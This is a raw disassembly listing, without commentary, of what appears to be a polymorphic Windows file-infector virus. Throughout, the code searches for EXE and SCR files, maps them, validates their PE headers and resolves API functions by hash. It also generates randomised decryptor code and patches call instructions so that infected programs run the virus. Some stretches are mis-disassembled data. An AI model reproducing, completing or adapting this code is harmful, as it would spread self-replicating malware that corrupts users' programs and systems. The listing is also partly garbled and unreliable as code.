mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_40B654
loc_40B668: ; CODE XREF: sub_40B60E+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_40B72B
cmp word ptr [eax-2], 3233h
jnz loc_40B72B
push esi
cmp dword ptr [edx], 0
jnz short loc_40B68B
mov ecx, [edx+10h]
jmp short loc_40B68D
; ---------------------------------------------------------------------------
loc_40B68B: ; CODE XREF: sub_40B60E+76�j
mov ecx, [edx]
loc_40B68D: ; CODE XREF: sub_40B60E+7B�j
add esi, ecx
push ecx
call sub_40B507
add esi, ss:dword_4039AA[ebp]
loc_40B69B: ; CODE XREF: sub_40B60E+90�j
; sub_40B60E+117�j
lodsd
test eax, eax
js short loc_40B69B
jz loc_40B72A
push ss:dword_4039AA[ebp]
push eax
call sub_40B507
add eax, ss:dword_4039AA[ebp]
pop ss:dword_4039AA[ebp]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_40B6C7: ; CODE XREF: sub_40B60E+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_40B6DE
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_40B6C7
; ---------------------------------------------------------------------------
loc_40B6DE: ; CODE XREF: sub_40B60E+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_40B724
cmp ebx, 0DB6E45A8h
jz short loc_40B724
cmp ebx, 0FFA13B59h
jz short loc_40B724
cmp ebx, 0ACB522D6h
jz short loc_40B724
cmp ebx, 0F358E993h
jz short loc_40B724
cmp ebx, 0F358E97Dh
jz short loc_40B724
cmp ebx, 0E1253F46h
jz short loc_40B724
cmp ebx, 0E1253F30h
jz short loc_40B724
call ss:dword_403992[ebp]
loc_40B724: ; CODE XREF: sub_40B60E+D6�j
; sub_40B60E+DE�j ...
pop ebx
jmp loc_40B69B
; ---------------------------------------------------------------------------
loc_40B72A: ; CODE XREF: sub_40B60E+92�j
pop esi
loc_40B72B: ; CODE XREF: sub_40B60E+60�j
; sub_40B60E+6C�j
add edx, 14h
jmp loc_40B622
; ---------------------------------------------------------------------------
locret_40B733: ; CODE XREF: sub_40B60E+18�j
; sub_40B60E+22�j
retn
sub_40B60E endp
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_40B735 proc near ; CODE XREF: seg002:0040B873�p
; seg002:0040B899�p
push 4
pop eax
call sub_40AD52
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_40AD52
add edx, 8
xchg edx, ecx
loc_40B75D: ; CODE XREF: sub_40B735:loc_40B79C�j
push 5
pop eax
call sub_40AD52
cmp dl, 3
jnb short loc_40B775
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_40B79C
; ---------------------------------------------------------------------------
loc_40B775: ; CODE XREF: sub_40B735+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_40B796
mov al, 11h
call sub_40AD52
mov eax, 1
loc_40B78A: ; CODE XREF: sub_40B735+5D�j
test dl, dl
jz short loc_40B79B
shl eax, 1
dec dl
jmp short loc_40B78A
; ---------------------------------------------------------------------------
jmp short loc_40B79B
; ---------------------------------------------------------------------------
loc_40B796: ; CODE XREF: sub_40B735+47�j
mov eax, 80000000h
loc_40B79B: ; CODE XREF: sub_40B735+57�j
; sub_40B735+5F�j
stosd
loc_40B79C: ; CODE XREF: sub_40B735+3E�j
loop loc_40B75D
retn
sub_40B735 endp
; ---------------------------------------------------------------------------
loc_40B79F: ; CODE XREF: sub_40C1F9+112�p
lea edi, [ebp+40343Ch]
test ss:dword_403431[ebp], 80000000h
jz short loc_40B7B4
mov al, 60h
stosb
loc_40B7B4: ; CODE XREF: seg002:0040B7AF�j
test ss:dword_403431[ebp], 1000003h
jz loc_40B8BA
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0BDCA6378h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test ss:dword_403431[ebp], 1000000h
mov ss:dword_40399A[ebp], edi
jz short loc_40B832
test ss:dword_403431[ebp], 2000000h
mov eax, 36FF6467h
jnz short loc_40B7FD
mov eax, 2E8B6467h
loc_40B7FD: ; CODE XREF: seg002:0040B7F6�j
stosd
mov ax, 0
stosw
jz short loc_40B809
mov al, 5Dh
stosb
loc_40B809: ; CODE XREF: seg002:0040B804�j
test ss:dword_403431[ebp], 8000000h
mov eax, 86D8Dh
jnz short loc_40B830
test ss:dword_403431[ebp], 4000000h
mov eax, 8C583h
jz short loc_40B830
mov eax, 0F8ED83h
loc_40B830: ; CODE XREF: seg002:0040B818�j
; seg002:0040B829�j
stosd
dec edi
loc_40B832: ; CODE XREF: seg002:0040B7E5�j
test ss:dword_403431[ebp], 3
jz short loc_40B842
mov al, 0E9h
stosb
stosd
loc_40B842: ; CODE XREF: seg002:0040B83C�j
mov eax, ss:dword_403996[ebp]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test ss:dword_403431[ebp], 3
jz short loc_40B8BA
mov eax, 36FF6467h
mov ss:dword_40399E[ebp], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_40B735
mov al, 20h
call sub_40B54E
jecxz short loc_40B8BA
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, ss:dword_403431[ebp]
not edx
test edx, 3
jnz short loc_40B8AD
call sub_40B735
mov al, 1Fh
call sub_40B54E
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_40B8AD: ; CODE XREF: seg002:0040B897�j
mov ecx, edi
mov eax, ss:dword_40399E[ebp]
sub ecx, eax
mov [eax-4], ecx
loc_40B8BA: ; CODE XREF: seg002:0040B7BE�j
; seg002:0040B859�j ...
test ss:dword_403431[ebp], 4
jz short loc_40B8D8
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_40B8D8: ; CODE XREF: seg002:0040B8C4�j
test ss:dword_403431[ebp], 8
jnz short loc_40B92E
cmp ss:byte_40342F[ebp], 0
jz short loc_40B92E
mov eax, 0C9291829h
or ah, ss:byte_40342B[ebp]
shl ah, 3
or ah, ss:byte_40342B[ebp]
stosd
mov al, 0B1h
stosb
mov al, ss:byte_40342F[ebp]
stosb
mov al, 40h
or al, ss:byte_40342B[ebp]
stosb
mov ax, 0FDE2h
test ss:dword_403431[ebp], 10h
jz short loc_40B92C
mov al, 49h
stosb
mov ax, 0FC75h
loc_40B92C: ; CODE XREF: seg002:0040B923�j
stosw
loc_40B92E: ; CODE XREF: seg002:0040B8E2�j
; seg002:0040B8EB�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov ss:dword_403982[ebp], edi
test ss:dword_403431[ebp], 20h
jnz short loc_40B94F
mov al, 58h
or al, ss:byte_403429[ebp]
stosb
loc_40B94F: ; CODE XREF: seg002:0040B944�j
mov ax, 0C081h
test ss:dword_403431[ebp], 40h
jz short loc_40B962
add ah, 28h
loc_40B962: ; CODE XREF: seg002:0040B95D�j
or ah, ss:byte_403429[ebp]
stosw
mov ss:dword_403986[ebp], edi
stosd
test ss:dword_403431[ebp], 40000000h
jnz short loc_40B986
mov al, 50h
add al, ss:byte_403429[ebp]
stosb
loc_40B986: ; CODE XREF: seg002:0040B97B�j
test ss:dword_403431[ebp], 80h
jnz short loc_40B99D
mov al, 0B8h
or al, ss:byte_40342A[ebp]
stosb
jmp short loc_40B9DA
; ---------------------------------------------------------------------------
loc_40B99D: ; CODE XREF: seg002:0040B990�j
mov ax, 1831h
test ss:dword_403431[ebp], 100h
jz short loc_40B9AF
mov al, 29h
loc_40B9AF: ; CODE XREF: seg002:0040B9AB�j
or ah, ss:byte_40342A[ebp]
shl ah, 3
or ah, ss:byte_40342A[ebp]
stosw
mov ax, 0F081h
test ss:dword_403431[ebp], 200h
jnz short loc_40B9D2
mov ah, 0C8h
loc_40B9D2: ; CODE XREF: seg002:0040B9CE�j
or ah, ss:byte_40342A[ebp]
stosw
loc_40B9DA: ; CODE XREF: seg002:0040B99B�j
mov ss:dword_4039A2[ebp], edi
mov eax, 243Ch
stosd
test ss:dword_403431[ebp], 8
jz short loc_40BA5E
test ss:dword_403431[ebp], 400h
jnz short loc_40BA09
mov al, 0B8h
or al, ss:byte_40342B[ebp]
stosb
jmp short loc_40BA56
; ---------------------------------------------------------------------------
loc_40BA09: ; CODE XREF: seg002:0040B9FC�j
test ss:dword_403431[ebp], 800h
jnz short loc_40BA26
mov ax, 0E083h
or ah, ss:byte_40342B[ebp]
stosw
xor eax, eax
stosb
jmp short loc_40BA3B
; ---------------------------------------------------------------------------
loc_40BA26: ; CODE XREF: seg002:0040BA13�j
mov ax, 1829h
or ah, ss:byte_40342B[ebp]
shl ah, 3
or ah, ss:byte_40342B[ebp]
stosw
loc_40BA3B: ; CODE XREF: seg002:0040BA24�j
test ss:dword_403431[ebp], 1000h
mov ax, 0C081h
jz short loc_40BA4E
add ah, 8
loc_40BA4E: ; CODE XREF: seg002:0040BA49�j
or ah, ss:byte_40342B[ebp]
stosw
loc_40BA56: ; CODE XREF: seg002:0040BA07�j
movzx eax, ss:byte_40342F[ebp]
stosd
loc_40BA5E: ; CODE XREF: seg002:0040B9F0�j
test ss:dword_403431[ebp], 40000000h
jz short loc_40BA73
mov al, 50h
add al, ss:byte_403429[ebp]
stosb
loc_40BA73: ; CODE XREF: seg002:0040BA68�j
test ss:dword_403431[ebp], 2000h
mov al, 86h
jnz short loc_40BA83
add al, 4
loc_40BA83: ; CODE XREF: seg002:0040BA7F�j
lea ecx, [edi-2]
mov ah, ss:byte_403429[ebp]
mov ss:dword_40398A[ebp], ecx
stosw
cmp ah, 5
jnz short loc_40BAA0
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_40BAA0: ; CODE XREF: seg002:0040BA97�j
test ss:dword_403431[ebp], 4000h
mov ax, 3166h
jnz short loc_40BAB2
mov ah, 29h
loc_40BAB2: ; CODE XREF: seg002:0040BAAE�j
stosw
mov al, 18h
or al, ss:byte_40342B[ebp]
shl al, 3
stosb
mov al, 88h
test ss:dword_403431[ebp], 8000h
jnz short loc_40BAD0
mov al, 86h
loc_40BAD0: ; CODE XREF: seg002:0040BACC�j
mov ah, ss:byte_403429[ebp]
stosw
cmp ah, 5
jnz short loc_40BAE4
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_40BAE4: ; CODE XREF: seg002:0040BADB�j
test ss:dword_403431[ebp], 10000h
jnz short loc_40BAFB
mov al, 40h
or al, ss:byte_403429[ebp]
stosb
jmp short loc_40BB0A
; ---------------------------------------------------------------------------
loc_40BAFB: ; CODE XREF: seg002:0040BAEE�j
mov ax, 0C083h
or ah, ss:byte_403429[ebp]
stosw
mov al, 1
stosb
loc_40BB0A: ; CODE XREF: seg002:0040BAF9�j
test ss:dword_403431[ebp], 20000h
jnz short loc_40BB45
test ss:dword_403431[ebp], 40000h
jnz short loc_40BB3C
mov al, 0C0h
or al, ss:byte_40342B[ebp]
mov ah, ss:byte_403430[ebp]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_40BB44
; ---------------------------------------------------------------------------
loc_40BB3C: ; CODE XREF: seg002:0040BB20�j
mov al, 40h
or al, ss:byte_40342B[ebp]
loc_40BB44: ; CODE XREF: seg002:0040BB3A�j
stosb
loc_40BB45: ; CODE XREF: seg002:0040BB14�j
test ss:dword_403431[ebp], 80000h
jnz short loc_40BB61
mov ax, 0E883h
or ah, ss:byte_40342A[ebp]
stosw
mov al, 1
jmp short loc_40BB69
; ---------------------------------------------------------------------------
loc_40BB61: ; CODE XREF: seg002:0040BB4F�j
mov al, 48h
or al, ss:byte_40342A[ebp]
loc_40BB69: ; CODE XREF: seg002:0040BB5F�j
stosb
test ss:dword_403431[ebp], 100000h
mov cl, 75h
jnz short loc_40BB9D
mov ax, 0F883h
or ah, ss:byte_40342A[ebp]
stosw
xor eax, eax
stosb
sub ss:dword_40398A[ebp], edi
test ss:dword_403431[ebp], 200000h
jnz short loc_40BBB8
mov cl, 77h
jmp short loc_40BBB8
; ---------------------------------------------------------------------------
loc_40BB9D: ; CODE XREF: seg002:0040BB76�j
mov ax, 1809h
or ah, ss:byte_40342A[ebp]
shl ah, 3
or ah, ss:byte_40342A[ebp]
stosw
sub ss:dword_40398A[ebp], edi
loc_40BBB8: ; CODE XREF: seg002:0040BB97�j
; seg002:0040BB9B�j
mov al, cl
mov ah, byte ptr ss:dword_40398A[ebp]
stosw
mov al, 58h
add al, ss:byte_403429[ebp]
stosb
test ss:dword_403431[ebp], 1000003h
jz loc_40BC62
mov eax, 268B6467h
mov ecx, ss:dword_403431[ebp]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_40BBF9
mov eax, 2E876467h
loc_40BBF9: ; CODE XREF: seg002:0040BBF2�j
stosd
mov eax, 0
stosw
jnz short loc_40BC09
mov ax, 0E58Bh
stosw
loc_40BC09: ; CODE XREF: seg002:0040BC01�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test ss:dword_403431[ebp], 1000000h
jnz short loc_40BC5F
test ss:dword_403431[ebp], 8000000h
jz short loc_40BC51
mov ax, 6C8Dh
test ss:dword_403431[ebp], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_40BC4C
mov ax, 424h
stosw
jmp short loc_40BC5F
; ---------------------------------------------------------------------------
loc_40BC4C: ; CODE XREF: seg002:0040BC42�j
mov al, 8
stosb
jmp short loc_40BC5F
; ---------------------------------------------------------------------------
loc_40BC51: ; CODE XREF: seg002:0040BC29�j
mov ax, 5D58h
add al, ss:byte_40342B[ebp]
stosw
jmp short loc_40BC62
; ---------------------------------------------------------------------------
loc_40BC5F: ; CODE XREF: seg002:0040BC1D�j
; seg002:0040BC4A�j ...
mov al, 0C9h
stosb
loc_40BC62: ; CODE XREF: seg002:0040BBD5�j
; seg002:0040BC5D�j
test ss:dword_403431[ebp], 80000000h
jz short loc_40BC8E
mov al, 7
sub al, ss:byte_403429[ebp]
shl eax, 1Ah
or eax, 240889h
add ah, ss:byte_403429[ebp]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_40BC8E: ; CODE XREF: seg002:0040BC6C�j
mov ax, 0E0FFh
or ah, ss:byte_403429[ebp]
stosw
test ss:dword_403431[ebp], 20h
jz short loc_40BCF9
test ss:dword_403431[ebp], 20000000h
jz short loc_40BCBF
loc_40BCB2: ; CODE XREF: seg002:0040BCBD�j
test edi, 3
jz short loc_40BCBF
mov al, 90h
stosb
jmp short loc_40BCB2
; ---------------------------------------------------------------------------
loc_40BCBF: ; CODE XREF: seg002:0040BCB0�j
; seg002:0040BCB8�j
mov eax, edi
mov ecx, ss:dword_403982[ebp]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, ss:byte_403429[ebp]
stosb
test ss:dword_403431[ebp], 400000h
jz short loc_40BCED
mov ax, 0C350h
or al, ss:byte_403429[ebp]
jmp short loc_40BCF7
; ---------------------------------------------------------------------------
loc_40BCED: ; CODE XREF: seg002:0040BCDF�j
mov ax, 0E0FFh
or ah, ss:byte_403429[ebp]
loc_40BCF7: ; CODE XREF: seg002:0040BCEB�j
stosw
loc_40BCF9: ; CODE XREF: seg002:0040BCA4�j
test ss:dword_403431[ebp], 1000003h
jz short loc_40BD78
test ss:dword_403431[ebp], 20000000h
jz short loc_40BD1E
loc_40BD11: ; CODE XREF: seg002:0040BD1C�j
test edi, 3
jz short loc_40BD1E
mov al, 90h
stosb
jmp short loc_40BD11
; ---------------------------------------------------------------------------
loc_40BD1E: ; CODE XREF: seg002:0040BD0F�j
; seg002:0040BD17�j
mov ecx, edi
mov eax, ss:dword_40399A[ebp]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test ss:dword_403431[ebp], 800000h
jnz short loc_40BD47
lea eax, byte_403429[ebp]
loc_40BD3F: ; CODE XREF: seg002:0040BD45�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_40BD3F
loc_40BD47: ; CODE XREF: seg002:0040BD37�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_40BD5C
mov ax, 0C031h
stosw
loc_40BD5C: ; CODE XREF: seg002:0040BD54�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_40BD75
mov ax, 0C031h
stosw
loc_40BD75: ; CODE XREF: seg002:0040BD6D�j
mov al, 0C3h
stosb
loc_40BD78: ; CODE XREF: seg002:0040BD03�j
lea eax, dword_40343C[ebp]
test ss:dword_403431[ebp], 10000000h
jnz short loc_40BD90
push edi
sub edi, eax
pop eax
jmp short loc_40BDA9
; ---------------------------------------------------------------------------
loc_40BD90: ; CODE XREF: seg002:0040BD88�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, ss:dword_4039A2[ebp]
add ss:dword_403982[ebp], edx
add [ecx], edi
mov eax, [esp+4]
loc_40BDA9: ; CODE XREF: seg002:0040BD8E�j
mov [ebp+40106Dh], edi
mov edi, ss:dword_403986[ebp]
sub eax, ss:dword_403982[ebp]
test ss:dword_403431[ebp], 40h
jz short loc_40BDC9
neg eax
loc_40BDC9: ; CODE XREF: seg002:0040BDC5�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_40BDCD proc near ; CODE XREF: sub_40C1F9+2A8�p
push esi
push edi
cmp ss:dword_4039AE[ebp], 0
jz loc_40BFB5
call near ptr loc_40BDED+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_40BDED: ; CODE XREF: sub_40BDCD+F�p
add bh, bh
sub_40BDCD endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_40B507
mov edx, ss:dword_4039A6[ebp]
pop ebx
add eax, [edx+0Ch]
mov ss:dword_4039C2[ebp], eax
add eax, [edx+8]
mov ss:dword_4039C6[ebp], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_40B507
mov edi, ss:dword_4039A6[ebp]
push esi
call sub_40B507
mov edx, ss:dword_4039A6[ebp]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_40BFB5
jz loc_40BFB5
add esi, ss:dword_4039AA[ebp]
add esi, ss:dword_403972[ebp]
; START OF FUNCTION CHUNK FOR sub_40BF86
loc_40BE67: ; CODE XREF: sub_40BF86+29�j
lodsb
cmp al, 0E8h
jnz loc_40BF12
lea eax, [esi+4]
sub eax, ss:dword_403972[ebp]
add eax, [esi]
push eax
call sub_40B507
cmp ss:dword_4039A6[ebp], 0
jnz short loc_40BE95
cmp eax, [edi+0Ch]
jnb loc_40BFAE
jmp short loc_40BEA1
; ---------------------------------------------------------------------------
loc_40BE95: ; CODE XREF: sub_40BF86-FE�j
cmp ss:dword_4039A6[ebp], edx
jnz loc_40BFAE
loc_40BEA1: ; CODE XREF: sub_40BF86-F3�j
add eax, ss:dword_403972[ebp]
cmp word ptr [eax], 25FFh
jnz loc_40BFAE
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_40B507
cmp ss:dword_4039A6[ebp], edi
jnz loc_40BFAE
add eax, ss:dword_4039AA[ebp]
add eax, ss:dword_403972[ebp]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_40BFAE
cmp eax, [edi+8]
jnb loc_40BFAE
loc_40BEEA: ; CODE XREF: sub_40BF86+22�j
add eax, 2
add eax, [edi+14h]
add eax, ss:dword_403972[ebp]
push edx
push eax
push ss:dword_4039BE[ebp]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_40BFC4
jmp loc_40BFAE
; ---------------------------------------------------------------------------
loc_40BF12: ; CODE XREF: sub_40BF86-11C�j
cmp al, 0FFh
jnz loc_40BFAE
cmp byte ptr [esi], 15h
jnz loc_40BFAE
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_40B507
cmp ss:dword_4039A6[ebp], edi
jnz short loc_40BFAE
add eax, ss:dword_4039AA[ebp]
add eax, ss:dword_403972[ebp]
mov ss:dword_4039CA[ebp], eax
mov eax, [eax]
cmp eax, ss:dword_4039C2[ebp]
jb short loc_40BF5B
cmp eax, ss:dword_4039C6[ebp]
jb short loc_40BFC4
loc_40BF5B: ; CODE XREF: sub_40BF86-35�j
cmp eax, 70000000h
jb short loc_40BF99
call sub_40BF86
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, ss:dword_4039CA[ebp]
jnz short locret_40BF85
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_40BFA0
; ---------------------------------------------------------------------------
locret_40BF85: ; CODE XREF: sub_40BF86-F�j
retn
; END OF FUNCTION CHUNK FOR sub_40BF86
; =============== S U B R O U T I N E =======================================
sub_40BF86 proc near ; CODE XREF: sub_40BF86-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 0040BE67 SIZE 0000011F BYTES
pop ss:dword_403992[ebp]
pusha
mov esi, ss:dword_403972[ebp]
call sub_40B60E
popa
loc_40BF99: ; CODE XREF: sub_40BF86-26�j
test eax, 80000000h
jnz short loc_40BFAE
loc_40BFA0: ; CODE XREF: sub_40BF86-3�j
sub eax, [edi+0Ch]
jb short loc_40BFAE
cmp eax, [edi+8]
jb loc_40BEEA
loc_40BFAE: ; CODE XREF: sub_40BF86-F9�j
; sub_40BF86-EB�j ...
dec ecx
jnz loc_40BE67
loc_40BFB5: ; CODE XREF: sub_40BDCD+9�j
; seg002:0040BE4F�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_40C000
; ---------------------------------------------------------------------------
loc_40BFC4: ; CODE XREF: sub_40BF86-7F�j
; sub_40BF86-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, ss:dword_4039AE[ebp]
lea edi, [ecx+2435h]
add eax, ss:dword_403972[ebp]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_40C000: ; CODE XREF: sub_40BF86+3C�j
pop edi
pop esi
retn
sub_40BF86 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40C003 proc near ; CODE XREF: seg002:0040C1D1�p
; sub_40C1F9+127�p
lea esi, dword_40384E[ebp]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_40C0D4
mov ss:dword_403952[ebp], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_40C0D4
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_40C58C
mov ss:dword_403956[ebp], eax
lea ecx, dword_40395A[ebp]
lea edx, dword_403962[ebp]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_40C580
push 0
push ss:dword_403956[ebp]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_40C580
mov ss:dword_40396A[ebp], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push ss:dword_403956[ebp]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_40C580
xor ecx, ecx
mov ss:dword_40396E[ebp], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_40C558
mov ss:dword_403972[ebp], eax
locret_40C0D4: ; CODE XREF: sub_40C003+10�j
; sub_40C003+27�j ...
retn
sub_40C003 endp
; =============== S U B R O U T I N E =======================================
sub_40C0D5 proc near ; CODE XREF: sub_40C1F9+117�p
; sub_40C1F9+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test ss:dword_403431[ebp], 10000000h
jnz short loc_40C0EF
add eax, [ebp+40106Dh]
loc_40C0EF: ; CODE XREF: sub_40C0D5+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov ss:dword_40397A[ebp], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov ss:dword_403976[ebp], eax
retn
sub_40C0D5 endp
; =============== S U B R O U T I N E =======================================
sub_40C11A proc near ; CODE XREF: sub_40C1F9:loc_40C248�p
; sub_40C1F9+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_40C11F: ; CODE XREF: sub_40C11A+23�j
jecxz short locret_40C156
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_40C156
cmp dword ptr [edx+0Ch], 1
jb short loc_40C11F
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, ss:dword_40396A[ebp]
locret_40C156: ; CODE XREF: sub_40C11A:loc_40C11F�j
; sub_40C11A+1D�j ...
retn
sub_40C11A endp
; =============== S U B R O U T I N E =======================================
sub_40C157 proc near ; CODE XREF: seg002:0040C1E3�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_40C157 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_40C164: ; CODE XREF: seg002:0040C185�j
mov ecx, edi
jmp short loc_40C173
; ---------------------------------------------------------------------------
lea edi, dword_40384E[ebp]
cld
loc_40C16F: ; CODE XREF: seg002:0040C181�j
mov ebx, edi
xor ecx, ecx
loc_40C173: ; CODE XREF: seg002:0040C166�j
; seg002:0040C189�j
lodsb
cmp al, 61h
jb short loc_40C17E
cmp al, 7Ah
ja short loc_40C17E
sub al, 20h
loc_40C17E: ; CODE XREF: seg002:0040C176�j
; seg002:0040C17A�j
stosb
cmp al, 5Ch
jz short loc_40C16F
cmp al, 2Eh
jz short loc_40C164
cmp al, 0
jnz short loc_40C173
jecxz short locret_40C156
mov eax, [ecx]
cmp eax, 455845h
jz short loc_40C1A1
cmp eax, 524353h
jnz locret_40C0D4
loc_40C1A1: ; CODE XREF: seg002:0040C194�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_40C0D4
cmp eax, 4E554357h
jz locret_40C0D4
cmp eax, 32334357h
jz locret_40C0D4
cmp eax, 4F545350h
jz locret_40C0D4
xor ebx, ebx
call sub_40C003
jz locret_40C0D4
xor edx, edx
call sub_40C1F9
call sub_40C157
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_40C536
; =============== S U B R O U T I N E =======================================
sub_40C1F9 proc near ; CODE XREF: seg002:0040C1DE�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, ss:dword_403972[ebp]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_40C536
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_40C536
test dword ptr [ebx+16h], 2000h
jnz loc_40C536
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_40C536
jecxz short loc_40C248
cmp ecx, 101h
jbe loc_40C536
loc_40C248: ; CODE XREF: sub_40C1F9+41�j
call sub_40C11A
jb loc_40C536
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_40AD52
xor ss:byte_40342F[ebp], dl
mov cl, 20h
xor ss:byte_403430[ebp], dh
loc_40C272: ; CODE XREF: sub_40C1F9+92�j
push 20h
dec cl
pop eax
js short loc_40C28D
call sub_40AD52
test edx, edx
setz dl
shl edx, cl
xor ss:dword_403431[ebp], edx
jmp short loc_40C272
; ---------------------------------------------------------------------------
loc_40C28D: ; CODE XREF: sub_40C1F9+7E�j
; sub_40C1F9+CD�j ...
push 6
pop ecx
loc_40C293: ; CODE XREF: sub_40C1F9+B8�j
push 6
pop eax
call sub_40AD52
mov al, ss:byte_403429[ebp]
xchg al, byte_403429[edx+ebp]
mov ss:byte_403429[ebp], al
loop loc_40C293
test ss:dword_403431[ebp], 8
jnz short loc_40C2C8
cmp ss:byte_40342B[ebp], 1
jz short loc_40C28D
loc_40C2C8: ; CODE XREF: sub_40C1F9+C4�j
test ss:dword_403431[ebp], 1000003h
jz short loc_40C2EF
cmp ss:byte_403429[ebp], 5
jz short loc_40C28D
cmp ss:byte_40342A[ebp], 5
jz short loc_40C28D
cmp ss:byte_40342B[ebp], 5
jz short loc_40C28D
loc_40C2EF: ; CODE XREF: sub_40C1F9+D9�j
test ss:dword_403431[ebp], 80000000h
jz short loc_40C304
cmp ss:byte_403429[ebp], 2
ja short loc_40C28D
loc_40C304: ; CODE XREF: sub_40C1F9+100�j
and ss:dword_4039AE[ebp], 0
call loc_40B79F
call sub_40C0D5
call sub_40C53F
mov ebx, ss:dword_403976[ebp]
call sub_40C003
jz loc_40C536
mov esi, ss:dword_403972[ebp]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_40C11A
jb loc_40C536
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
